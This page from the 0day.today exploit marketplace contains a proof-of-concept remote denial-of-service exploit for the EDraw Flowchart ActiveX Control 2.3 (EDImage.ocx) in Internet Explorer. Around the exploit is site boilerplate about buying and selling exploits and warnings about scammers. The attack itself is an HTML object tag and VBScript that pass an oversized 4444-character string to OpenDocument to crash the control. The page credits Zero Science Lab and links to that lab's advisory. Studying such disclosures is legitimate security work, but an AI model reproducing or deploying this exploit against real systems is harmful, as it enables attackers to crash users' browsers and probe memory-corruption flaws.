0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) DoS Exploit (IE)
========================================================================= EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE) ========================================================================= ###################### EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE) Vendor: EdrawSoft - http://www.edrawsoft.com Platform Used: MS Win XP Pro SP3 (en) / IE 8.0 CompanyName EDrawSoft FileDescription EDraw Flowchart ActiveX Control Module FileVersion 2, 3, 0, 6 InternalName EDrawSoft LegalCopyright Copyright (C) 2005 OriginalFileName EDImage.OCX ProductName EDraw Flowchart ActiveX Control Module ProductVersion 2, 3, 0, 6 Report for Clsid: {F685AFD8-A5CC-410E-98E4-BAA1C559BA61} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Zero Science Lab - http://www.zeroscience.mk liquidworm gmail com 18.04.2010 Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4936.php ###################### <object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='thricer' /> <script language='vbscript'> targetFile = "C:\PROGRA~1\EDIMAG~1\EDImage.ocx" prototype = "Function OpenDocument ( ByVal filename As String ) As Boolean" memberName = "OpenDocument" progid = "EDIMAGELib.EDImage" argCount = 1 arg1=String(4444, "J") thricer.OpenDocument arg1 </script> # 0day.today [2024-12-24] #